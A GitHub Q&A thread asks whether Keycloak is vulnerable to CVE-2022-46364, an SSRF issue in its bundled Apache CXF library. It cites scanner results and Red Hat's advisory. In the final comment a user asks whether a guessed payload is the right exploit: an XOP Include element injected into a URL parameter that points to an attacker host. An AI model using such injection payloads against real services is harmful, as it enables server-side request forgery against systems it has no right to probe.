### DISCUSSION TITLE
Is Keycloak affected by CVE-2022-46364?

### DISCUSSION THREAD

**Discussion by ansterr** [keycloak/keycloak#16455] [Q&A]
It looks like Keycloak is using org.apache.cxf : cxf-core : 3.4.5 which has this vulnerability. Is Keycloak affected?

**Comment by lukaseckert** [comment]
Same question here, the Keycloak Image is reported by the security scanner, and I'm not sure if it is a false positive.
While the Keycloak Docker image contains about 40 cxf-related jar files of the problematic version from the underlying JBoss, I can't see whether the conditions of the CVE are met ("... MTOM requests [...] that take at least one parameter of any type.")
See https://cxf.apache.org/security-advisories.data/CVE-2022-46364.txt?version=1&modificationDate=1670944472739&api=v2

My hints so far:
- The Keycloak pom has a direct dependency on the CXF lib.
- Red Hat lists Red Hat Single Sign-On 7, which is based on Keycloak 18, as "affected" (https://access.redhat.com/security/cve/cve-2022-46364).
- On the mentioned Red Hat page we find the statement "_Red Hat Integration Camel Quarkus does not support CXF extensions and so is affected at a reduced impact of Moderate._", however the new Quarkus-based Keycloak image does not contain any cxf jars.  I don't know how RH Camel Quarkus is related to the JBoss-based versions of Keycloak which contain Apache CXF.

**Comment by sedorf** [comment]
Hello @lukaseckert , 

("... MTOM requests [...] that take at least one parameter of any type.") meaning that parameter like that ( done?url=) and the exploitation like ( done?url=<stringvalue><inc:Include href="http://attackers.site/exploit/payload" xmlns:inc="http://www.w3.org/2004/08/xop/include"/><stringvalue> )  ?? is this correct ? is this really to exploitation of that vulnerability ? if not then how ?

Thanks ,
